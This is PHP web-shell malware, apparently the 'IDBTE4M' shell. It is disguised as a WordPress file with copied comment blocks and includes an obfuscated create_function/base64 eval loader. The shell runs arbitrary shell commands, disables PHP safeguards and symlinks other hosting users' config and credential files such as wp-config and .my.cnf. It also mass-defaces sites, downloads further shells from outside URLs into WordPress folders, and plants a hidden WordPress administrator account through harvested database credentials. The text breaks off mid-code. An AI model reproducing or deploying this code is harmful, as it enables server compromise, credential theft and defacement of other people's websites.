<table width="900" border="0" cellpadding="3" cellspacing="1" align="center">
';
echo '<font color="aqua"><center>'.php_uname().'</center></font><br>';
echo '<tr><td>
<center>
<div id="content-center">
<form method="post">
<input type="text" name="cmd" size="30"><input type="submit" value="Command">
</form>
<br>
[ <a href="?"><font color="aqua">Home</font></a> ]-[ <a href="?do=wpm"><font color="aqua">Wp Mass</font></a> ]-[ <a href="?do=jumping"><font color="aqua">Jumping</font></a> ]-[ <a href="?do=mass_deface"><font color="aqua">Mass Deface</font></a> ]-[ <a href="?do=RDP"><font color="aqua">KRDP</font></a> ]-[ <a href="?do=config"><font color="aqua">Config Grab</font></a> ]-[ <a href="?do=tolls"><font color="aqua">Cp</font></a> ]

<br><br>';
echo 'IDBTE4M #> ';
if(isset($_GET['path'])){
    $path = $_GET['path'];   
}else{
    $path = getcwd();
}
$path = str_replace('\\','/',$path);
$paths = explode('/',$path);

foreach($paths as $id=>$pat){
    if($pat == '' && $id == 0){
        $a = true;
        echo '<a href="?path=/">/</a>';
        continue;
    }
    if($pat == '') continue;
    echo '<a href="?path=';
    for($i=0;$i<=$id;$i++){
        echo "$paths[$i]";
        if($i != $id) echo "/";
    }
    echo '">'.$pat.'</a>/';
}
echo '</td></tr><tr><td>';
if(isset($_FILES['file'])){
    if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
        echo '<font color="green">OK COK SUKSESS !!</font><br />';
    }else{
        echo '<font color="red">ASU RAIMU ELK :P</font><br />';
    }
}
echo '<center>
<form enctype="multipart/form-data" method="POST">
<input type="file" name="file" />
<input type="submit" value="upload" />
</form>
</td></tr>';
if(isset($_GET['filesrc'])){
    echo "<tr><td>Current File : ";
    echo $_GET['filesrc'];
    echo '</tr></td></table><br />';
    echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
    echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
    if($_POST['opt'] == 'chmod'){
        if(isset($_POST['perm'])){
            if(chmod($_POST['path'],$_POST['perm'])){
                echo '<font color="green">Change Permission Done.</font><br />';
            }else{
                echo '<font color="red">Change Permission Error.</font><br />';
            }
        }
        echo '<form method="POST">
        Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="chmod">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'rename'){
        if(isset($_POST['newname'])){
            if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
                echo '<font color="green">Change Name Done.</font><br />';
            }else{
                echo '<font color="red">Change Name Error.</font><br />';
            }
            $_POST['name'] = $_POST['newname'];
        }
        echo '<form method="POST">
        New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="rename">
        <input type="submit" value="Go" />
        </form>';
    }elseif($_POST['opt'] == 'edit'){
        if(isset($_POST['src'])){
            $fp = fopen($_POST['path'],'w');
            if(fwrite($fp,$_POST['src'])){
                echo '<font color="green">Edit File Done.</font><br />';
            }else{
                echo '<font color="red">Edit File Error.</font><br />';
            }
            fclose($fp);
        }
        echo '<form method="POST">
        <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="opt" value="edit">
        <input type="submit" value="Go" />
        </form>';
    }
    echo '</center>';
}else{
    echo '</table><br /><center>';
    if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
        if($_POST['type'] == 'dir'){
            if(rmdir($_POST['path'])){
                echo '<font color="green">Delete Dir Done.</font><br />';
            }else{
                echo '<font color="red">Delete Dir Error.</font><br />';
            }
        }elseif($_POST['type'] == 'file'){
            if(unlink($_POST['path'])){
                echo '<font color="green">Delete File Done.</font><br />';
            }else{
                echo '<font color="red">Delete File Error.</font><br />';
            }
        }
    }
    echo '</center>';
    $scandir = scandir($path);
    echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
    <tr class="first">
        <td><center>Name</center></td>
        <td><center>Size</center></td>
        <td><center>Permissions</center></td>
        <td><center>Options</center></td>
    </tr>';

    foreach($scandir as $dir){
        if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
        echo "<tr>
        <td><a href=\"?path=$path/$dir\">$dir</a></td>
        <td><center>--</center></td>
        <td><center>";
        if(is_writable("$path/$dir")) echo '<font color="aqua">';
        elseif(!is_readable("$path/$dir")) echo '<font color="red">';
        echo perms("$path/$dir");
        if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
        
        echo "</center></td>
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
        <select name=\"opt\">
	    <option value=\"\"></option>
        <option value=\"delete\">Delete</option>
        <option value=\"chmod\">Chmod</option>
        <option value=\"rename\">Rename</option>
        </select>
        <input type=\"hidden\" name=\"type\" value=\"dir\">
        <input type=\"hidden\" name=\"name\" value=\"$dir\">
        <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
        <input type=\"submit\" value=\">\" />
        </form></center></td>
        </tr>";
    }
    echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
    foreach($scandir as $file){
        if(!is_file("$path/$file")) continue;
        $size = filesize("$path/$file")/1024;
        $size = round($size,3);
        if($size >= 1024){
            $size = round($size/1024,2).' MB';
        }else{
            $size = $size.' KB';
        }

        echo "<tr>
        <td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
        <td><center>".$size."</center></td>
        <td><center>";
        if(is_writable("$path/$file")) echo '<font color="aqua">';
        elseif(!is_readable("$path/$file")) echo '<font color="red">';
        echo perms("$path/$file");
        if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
        echo "</center></td>
        <td><center><form method=\"POST\" action=\"?option&path=$path\">
        <select name=\"opt\">
	    <option value=\"\"></option>
        <option value=\"delete\">Delete</option>
        <option value=\"chmod\">Chmod</option>
        <option value=\"rename\">Rename</option>
        <option value=\"edit\">Edit</option>
        </select>
        <input type=\"hidden\" name=\"type\" value=\"file\">
        <input type=\"hidden\" name=\"name\" value=\"$file\">
        <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
        <input type=\"submit\" value=\">\" />
        </form></center></td>
        </tr>";
    }
    echo '</table>
    </div>';
}
echo '
</BODY>
</HTML>';
function perms($file){
    $perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
    // Socket
    $info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
    // Symbolic Link
    $info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
    // Regular
    $info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
    // Block special
    $info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
    // Directory
    $info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
    // Character special
    $info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
    // FIFO pipe
    $info = 'p';
} else {
    // Unknown
    $info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
            (($perms & 0x0800) ? 's' : 'x' ) :
            (($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
            (($perms & 0x0400) ? 's' : 'x' ) :
            (($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
            (($perms & 0x0200) ? 't' : 'x' ) :
            (($perms & 0x0200) ? 'T' : '-'));

    return $info;
}
?>");exit; 
 /** 
 * Whether this is an XML-RPC Request 
 * 
 * @var bool 
  * Used to set up and fix common variables and include 
 * the WordPress procedural and class library. 
 * 
 * Allows for some configuration in wp-config.php (see default-constants.php) 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Stores the location of the WordPress directory of functions, classes, and core content. 
 * 
 * @since 1.0.0 
 * Outputs the OPML XML format for getting the links defined in the link 
 * administration. This can be used to export links from one blog over to 
 * another. Links aren't exported by the WordPress export, so this file handles 
 * that. 
 * 
 * This file is not added by default to WordPress theme pages when outputting 
 * feed links. It will have to be added manually for browsers and users to pick 
 * up that this file exists. 
 * 
 * @package WordPress 
 *//** 
 * Whether this is an XML-RPC Request 
 * 
 * @var bool 
  * Used to set up and fix common variables and include 
 * the WordPress procedural and class library. 
 * 
 * Allows for some configuration in wp-config.php (see default-constants.php) 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Stores the location of the WordPress directory of functions, classes, and core content. 
 * 
 * @since 1.0.0 
 * Outputs the OPML XML format for getting the links defined in the link 
 * administration. This can be used to export links from one blog over to 
 * another. Links aren't exported by the WordPress export, so this file handles 
 * that. 
 * 
 * This file is not added by default to WordPress theme pages when outputting 
 * feed links. It will have to be added manually for browsers and users to pick 
 * up that this file exists. 
 * 
 * @package WordPress 
 *//** 
 * Whether this is an XML-RPC Request 
 * 
 * @var bool 
  * Used to set up and fix common variables and include 
 * the WordPress procedural and class library. 
 * 
 * Allows for some configuration in wp-config.php (see default-constants.php) 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Stores the location of the WordPress directory of functions, classes, and core content. 
 * 
 * @since 1.0.0 
 * Outputs the OPML XML format for getting the links defined in the link 
 * administration. This can be used to export links from one blog over to 
 * another. Links aren't exported by the WordPress export, so this file handles 
 * that. 
 * 
 * This file is not added by default to WordPress theme pages when outputting 
 * feed links. It will have to be added manually for browsers and users to pick 
 * up that this file exists. 
 * 
 * @package WordPress 
 */ 
 ?>

Did this file decode correctly?

Original Code

<?php
/**
 * Prints signup_header via wp_head
 *
 * @since MU (3.0.0)
 Fix for page title
 
 * Bootstrap file for setting the ABSPATH constant
 * and loading the wp-config.php file. The wp-config.php
 * file will then load the wp-settings.php file, which
 * will then set up the WordPress environment.
 *
 * If the wp-config.php file is not found then an error
 * will be displayed asking the visitor to set up the
 * wp-config.php file.
 *
 * Will also search for wp-config.php in WordPress' parent
 * directory to allow the WordPress directory to remain
 * untouched.
 *
 * @package WordPress
  * WordPress User Page
 *
 * Handles authentication, registering, resetting passwords, forgot password,
 * and other user handling.
 *
 * @package WordPress
  * Handle Trackbacks and Pingbacks Sent to WordPress
 *
 * @since 0.71
 *
 * @package WordPress
 * @subpackage Trackbacks
  * XML-RPC protocol support for WordPress
 *
 * @package WordPress
 */

/**
 * Whether this is an XML-RPC Request
 *
 * @var bool
  * Used to set up and fix common variables and include
 * the WordPress procedural and class library.
 *
 * Allows for some configuration in wp-config.php (see default-constants.php)
 *
 * @package WordPress
 */

/**
 * Stores the location of the WordPress directory of functions, classes, and core content.
 *
 * @since 1.0.0
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 */
 /**
 * Whether this is an XML-RPC Request
 *
 * @var bool
  * Used to set up and fix common variables and include
 * the WordPress procedural and class library.
 *
 * Allows for some configuration in wp-config.php (see default-constants.php)
 *
 * @package WordPress
 */

/**
 * Stores the location of the WordPress directory of functions, classes, and core content.
 *
 * @since 1.0.0
 * Outputs the OPML XML format for getting the links defined in the link
 * administration. This can be used to export links from one blog over to
 * another. Links aren't exported by the WordPress export, so this file handles
 * that.
 *
 * This file is not added by default to WordPress theme pages when outputting
 * feed links. It will have to be added manually for browsers and users to pick
 * up that this file exists.
 *
 * @package WordPress
 */
@clearstatcache(); @set_time_limit(0); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors', 0); $settings="cr"."ea"."te"."_fu"."nction";$x=$settings("\$c","e"."va"."l"."('?>'.ba"."se6"."4_d"."ecode(\$c));");$x("<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
$asui = getcwd() . "/";
$ip = gethostbyname($_SERVER['HTTP_HOST']);
$ini = "fopen";
$fw = "fwrite";
$ada = "function_exists";
$crot = "shell_exec";
if (isset($_POST['cmd'])) {
    $mulai = $ini('php.ini', 'w');
    $buat = " safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
register_globals = ON
exec = ON
shell_exec = ON";
    $fw($mulai, $buat);
    if ($ada('shell_exec')) {
        $lihat = $_POST['cmd'];
        $hasil = $crot("$lihat");
        echo "<pre>$hasil</pre>";
    }
    
}

if($_GET['do'] == 'config') {
@ini_set('max_execution_time',0); 
@ini_set('display_errors', 0); 
@ini_set('file_uploads',1);
echo '<form method="POST"><textarea cols="30" name="passwd"  rows="10">'; 
$uSr=file("/etc/passwd"); 
foreach($uSr as $usrr) { 
$str=explode(":",$usrr); echo $str[0]."\n"; } 
echo'</textarea><br><input type="hidden" class="input" name="folfig" value="taek" size=40 />
<select class="inp"  title="Select Your Type File"  name="type" size=""><option title="type txt" value=".txt">.txt<option><option title="type php" value=".php">.php<option><option title="type shtml" value=".shtml">.shtml<option><option title="type ini" value=".ini">.ini<option></select>
<input name="conf" size="80" class="ipt" value="Hajar..." type="submit"><br><br></form></center>';}
if ($_POST['conf']) {
$folfig = $_POST['folfig']; $type = $_POST['type'];
@mkdir($folfig, 0755); 
@chdir($folfig);
$htaccess="
Options Indexes FollowSymLinks
DirectoryIndex .my.cnf
AddType txt .php
AddType txt .my.cnf
AddType txt .accesshash
AddHandler txt .php
AddHandler txt .cnf
AddHandler txt .accesshash
";
file_put_contents(".htaccess",$htaccess,FILE_APPEND);
$passwd=explode("\n",$_POST["passwd"]); echo "<blink><center >tunggu sebentar ya ...</center></blink>";
foreach($passwd as $pwd){ $user=trim($pwd);
@symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vBulletin1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-vBulletin3.txt');
@symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-vBulletin4.txt');
@symlink('/home/'.$user.'/public_html/config.php',$user.'-Phpbb1.txt');
@symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Phpbb2.txt');
@symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress1.txt');
@symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress2.txt');
@symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla1.txt');
@symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla2.txt');
@symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla3.txt');
@symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-Whm1.txt');
@symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-Whm2.txt');
@symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-Whm3.txt');
@symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-Whm4.txt');
@symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-Whm5.txt');
@symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-Whm6.txt');
@symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-Whm7.txt');
@symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-Whm8.txt');
@symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-Whm9.txt');
@symlink('/home/'.$user.'/public_html/admin/conf.php',$user.'-5.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-4.txt');
@symlink('/home/'.$user.'/public_html/conf_global.php',$user.'-invisio.txt');
@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-7.txt');
@symlink('/home/'.$user.'/public_html/connect.php',$user.'-8.txt');
@symlink('/home/'.$user.'/public_html/mk_conf.php',$user.'-mk-portale1.txt');
@symlink('/home/'.$user.'/public_html/include/config.php',$user.'-12.txt');
@symlink('/home/'.$user.'/public_html/settings.php',$user.'-Smf.txt');
@symlink('/home/'.$user.'/public_html/includes/functions.php',$user.'-phpbb3.txt');
@symlink('/home/'.$user.'/public_html/include/db.php',$user.'-infinity.txt');
@symlink('/home/'.$user.'/.my.cnf',$user.'-cpanel.txt');
@symlink('/home/'.$user.'/.accesshash',$user.'-whm.txt');
@symlink('/home/'.$user.'/public_html/admin/config.php',$user.'-opencart.txt');
@symlink('/home/'.$user.'/public_html/slconfig.php',$user.'-sitelok.txt');
@symlink('/home/'.$user.'/public_html/application/config/database.php',$user.'-elislab.txt');
@symlink('/home/'.$user.'/public_html/app/etc/local.xml',$user.'-mangentot.txt');
@symlink('/home/'.$user.'/public_html/config/koneksi.php',$user.'-lokmed.txt');
@symlink('/home/'.$user.'/public_html/po-library/po-config.php',$user.'-popojembut.txt');
@symlink('/home/'.$user.'/public_html/lokomedia/config/koneksi.php',$user.'-lokmed.txt');
echo '<center>Selesai mas/mba bro untuk melihat hasilnya klik -> <blink><a href='.$folfig.'>'.$folfig.'</a></blink>';

}
}
if($_GET['do'] == 'mass_deface') {
	function sabun_massal($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $lokasi<br>";
							file_put_contents($lokasi, $isi_script);
							$idx = sabun_massal($dirc,$namafile,$isi_script);
						}
					}
				}
			}
		}
	}
	function sabun_biasa($dir,$namafile,$isi_script) {
		if(is_writable($dir)) {
			$dira = scandir($dir);
			foreach($dira as $dirb) {
				$dirc = "$dir/$dirb";
				$lokasi = $dirc.'/'.$namafile;
				if($dirb === '.') {
					file_put_contents($lokasi, $isi_script);
				} elseif($dirb === '..') {
					file_put_contents($lokasi, $isi_script);
				} else {
					if(is_dir($dirc)) {
						if(is_writable($dirc)) {
							echo "[<font color=lime>DONE</font>] $dirb/$namafile<br>";
							file_put_contents($lokasi, $isi_script);
						}
					}
				}
			}
		}
	}
	if($_POST['start']) {
		if($_POST['tipe_sabun'] == 'mahal') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		} elseif($_POST['tipe_sabun'] == 'murah') {
			echo "<div style='margin: 5px auto; padding: 5px'>";
			sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
			echo "</div>";
		}
	} else {
	echo "<center>";
	echo "<form method='post'>
	<font style='text-decoration: underline;'>Tipe Sabun:</font><br>
	<input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
	<font style='text-decoration: underline;'>Folder:</font><br>
	<input type='text' name='d_dir' value='$asui' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Filename:</font><br>
	<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
	<font style='text-decoration: underline;'>Index File:</font><br>
	<textarea name='script' style='width: 450px; height: 200px;'>Hacked by IDBTE4M</textarea><br>
	<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
	</form></center>";
	}
}
if($_GET['do'] == 'jumping') {
	$i = 0;
	echo "<div class='margin: 5px auto;'>";
	if(preg_match("/hsphere/", $dir)) {
		$urls = explode("\r\n", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$url = str_replace(array("http://","www."), "", strtolower($url));
				$etc = "/etc/passwd";
				$f = fopen($etc,"r");
				while($gets = fgets($f)) {
					$pecah = explode(":", $gets);
					$user = $pecah[0];
					$dir_user = "/hsphere/local/home/$user";
					if(is_dir($dir_user) === true) {
						$url_user = $dir_user."/".$url;
						if(is_readable($url_user)) {
							$i++;
							$jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a><br>";
							if(is_writable($url_user)) {
								$jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a><br>";
							}
							echo $jrw."<br>";
						}
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
			$fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
			while($getss = fgets($fp)) {
				echo $getss;
			}
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} elseif(preg_match("/vhosts/", $dir)) {
		$urls = explode("\r\n", $_POST['url']);
		if(isset($_POST['jump'])) {
			echo "<pre>";
			foreach($urls as $url) {
				$web_vh = "/var/www/vhosts/$url/httpdocs";
				if(is_dir($web_vh) === true) {
					if(is_readable($web_vh)) {
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a><br>";
						if(is_writable($web_vh)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a><br>";
						}
						echo $jrw."<br>";
					}
				}
			}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
		} else {
			echo '<center>
				  <form method="post">
				  List Domains: <br>
				  <textarea name="url" style="width: 500px; height: 250px;">';
				  bing("ip:$ip");
			echo  '</textarea><br>
				  <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
				  </form></center>';
		}
	} else {
		echo "<pre>";
		$etc = fopen("/etc/passwd", "r");
		while($passwd = fgets($etc)) {
			if($passwd == '' || !$etc) {
				echo "<font color=red>Can't read /etc/passwd</font>";
			} else {
				preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
				foreach($user_jumping[1] as $user_idx_jump) {
					$user_jumping_dir = "/home/$user_idx_jump/public_html";
					if(is_readable($user_jumping_dir)){
						$i++;
						$jrw = "[<font color=lime>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
						if(is_writable($user_jumping_dir)) {
							$jrw = "[<font color=lime>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
						}
						echo $jrw;
						if(function_exists('posix_getpwuid')) {
							$domain_jump = file_get_contents("/etc/named.conf");	
							if($domain_jump == '') {
								echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
							} else {
								preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
								foreach($domains_jump[1] as $dj) {
									$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
									$user_jumping_url = $user_jumping_url['name'];
									if($user_jumping_url == $user_idx_jump) {
										echo " => ( <u>$dj</u> )<br>";
										break;
									}
								}
							}
						} else {
							echo "<br>";
						}
					}
				}
			}
		}
		if($i == 0) { 
		} else {
			echo "<br>Total ada ".$i." Kamar di ".$ip;
		}
		echo "</pre>";
	}
	echo "</div>";
}
if($_GET['do'] == 'cret') {
function get_contents($url){
  $ch = curl_init("$url");
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
  curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
  $result = curl_exec($ch);
  return $result;
}

$hecindex = get_contents('http://interchemie.com.ua/libs/l.txt');
$indexyol = $_SERVER['DOCUMENT_ROOT'] . "/.well-known/pki-validation/index.php" ; 
if (file_put_contents ($indexyol, $hecindex));

$htaccess = get_contents('http://ndot.us/za'); 
$htaccesss = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/pomo/umpomone.php" ;
if (file_put_contents ($htaccesss, $htaccess));

$wpoptions = get_contents('http://interchemie.com.ua/libs/l.txt'); 
$wpoptionss = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/plugins/hello.php" ;
if (file_put_contents ($wpoptionss, $wpoptions));


$momindex = get_contents('http://interchemie.com.ua/libs/l.txt');
$momindexx = $_SERVER['DOCUMENT_ROOT'] . "/indeeeex.php" ; 
if (file_put_contents($momindexx, $momindex));

$moduler = get_contents('https://raw.githubusercontent.com/indoxploit-coders/tmp-shell/master/tmp-shell.php');
$modulerr = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/modulke.php";
if (file_put_contents($modulerr, $moduler));

/*BURDAN YUKARI RANDOM SCR&#304;PT*/
/*BURDAN A&#350;&#350;A&#286;ISI WORDPRESSS*/
$wordpress = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/themes/";
if (file_exists($wordpress)) {
	
$wpmodul2 = $_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css/colors/blue.php" ;
if (file_put_contents($wpmodul2, $moduler));
if(file_exists($wpmodul2)){
    echo "sex 1 </br>"; 

@chmod($_SERVER['DOCUMENT_ROOT'] . "/indeeeex.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/.well-known/pki-validation/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-includes/pomo/umpomone.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-content/plugins/hello.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css/colors/blue.php", 0644);
echo "Hectopat"."<br>";

}
}
	}else{
			
		}
if($_GET['do'] == 'wpm') {
echo '

<center>
<form method="post">
<input type="text" name="confleg" placeholder="Config URL Here">
<br><br>
<input type="submit" name="chxe" value="Submit">
</form><br><br>
';

@error_reporting(0);
@ini_set('html_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('display_errors', 0);
@ini_set('file_uploads', 1);
$ra44 = rand(1, 99999);
function randomNumber($length) {
    $result = '';

    for($i = 0; $i < $length; $i++) {
        $result .= mt_rand(0, 9);
    }

    return $result;
}
function httpGet($url)
{
    $ch = curl_init();
    
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0");
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $output = curl_exec($ch);
    
    curl_close($ch);
    return $output;
}


    if ($_POST['chxe']) {
        $get2 = httpGet($_POST['confleg']);
        preg_match_all('#<a href="(.*?)"#', $get2, $config);
        $count = 1;
        foreach ($config[1] as $don) {
        $kontol = "J3mb0tz";
        $ngntd = "./Mawotz-M4w0tz";
        $get = httpGet($_POST['confleg'] . "/" . $don);
            if(preg_match('/table_prefix/', $get)){
            preg_match_all('/DB_HOST["\'], ["\'](.*?)["\']/', $get, $host);

            $don44 = end($host);
            $host = end($don44);
                #echo $host;
            
            preg_match_all('/DB_PASSWORD["\'], ["\'](.*?)["\']/', $get, $pass);

            $done = end($pass);
            $password = end($done);
            #echo $password."<br>";
            
            preg_match_all('/DB_USER["\'], ["\'](.*?)["\']/', $get, $user);
 
            $done1 = end($user);
            $user = end($done1);
                #echo $user;

            preg_match_all('/DB_NAME["\'], ["\'](.*?)["\']/', $get, $name);

            $done2 = end($name);
            $name = end($done2);
                #echo $name;

            $get23 = preg_replace('/[\s$@_*]+/', '_', $get);
            #echo($get23);
            preg_match_all("/table_prefix_=_['\"](.*?)['\"]/", $get23, $prefix);
            $done3 = end($prefix);
            $prefix = end($done3);
            #echo $prefix;
            $connect = mysqli_connect($host, $user, $password, $name);
            if ($connect) {
                $query1 = mysqli_query($connect, "select * from " . $prefix . "options where option_name='siteurl'");
                
                while ($siteurl = mysqli_fetch_array($query1)) {
                    $site_url = $siteurl['option_value'];
                }
                $query2 = mysqli_query($connect, "INSERT INTO " . $prefix . "users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('" . $ra44 . "', '".$kontol."', '".md5($ngntd)."', 'admins', 'yorangonombot@gmail.com', 'http://www.test.com/', '2011-06-07 00:00:00', '', '0', 'admins')");
                
                $query3 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $ra44 . "', '" . $prefix . "capabilities', '" . 'a:1:{s:13:"administrator";s:1:"1";}' . "')");
                
                $query4 = mysqli_query($connect, "INSERT INTO " . $prefix . "usermeta (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES (NULL, '" . $ra44 . "', '" . $prefix . "user_level', '10')");
                
                
                if ($query2) {
